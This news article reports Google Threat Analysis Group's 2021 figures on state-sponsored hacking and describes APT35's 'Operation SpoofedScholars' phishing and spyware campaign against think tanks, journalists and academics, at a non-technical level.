On Thursday, Google’s Threat Analysis Group (TAG) revealed that it is currently monitoring over 270 state-sponsored threat actors operating across more than 50 countries. Since the beginning of 2021, TAG has issued approximately 50,000 alerts concerning phishing and malware attempts tied to these government-backed actors.
This represents a 33% increase in alerts when compared to 2020, largely attributed to Google’s efforts in thwarting a significant campaign orchestrated by a Russian group known as APT28, colloquially referred to as Fancy Bear.
In addition, Google disclosed its disruption of multiple campaigns attributed to the Iranian state-sponsored group APT35, also known as Charming Kitten, Phosphorous, or Newscaster. This group executed a complex social engineering scheme labeled “Operation SpoofedScholars,” targeting think tanks, journalists, and academics to extract sensitive information by impersonating scholars from the University of London’s School of Oriental and African Studies (SOAS).
Proofpoint, a cybersecurity firm, first documented details of this attack in July 2021. The operation involved deploying a spyware-infested VPN application to the Google Play Store. When users installed the app, it could capture sensitive information, including call logs, text messages, contacts, and location data from compromised devices. Notably, APT35 employed an unusual strategy utilizing Telegram to receive real-time notifications when phishing sites under their control were accessed, achieved through malicious JavaScript embedded in the pages.
The group has also been known to impersonate policy officials by sending seemingly benign initial contact emails surrounding high-profile conferences, such as the Munich Security Conference and the Think-20 (T20) Italy forum. This tactic is a part of their broader phishing campaigns designed to deceive influential individuals into visiting malicious websites.
According to Ajax Bash of Google TAG, for years, APT35 has relied on account hijacking, malware deployment, and innovative methods to engage in espionage aligned with Iranian governmental interests. The ramifications of these ongoing threats serve as a stark reminder for organizations to enhance their cybersecurity measures to mitigate risks associated with state-sponsored cyber activities.
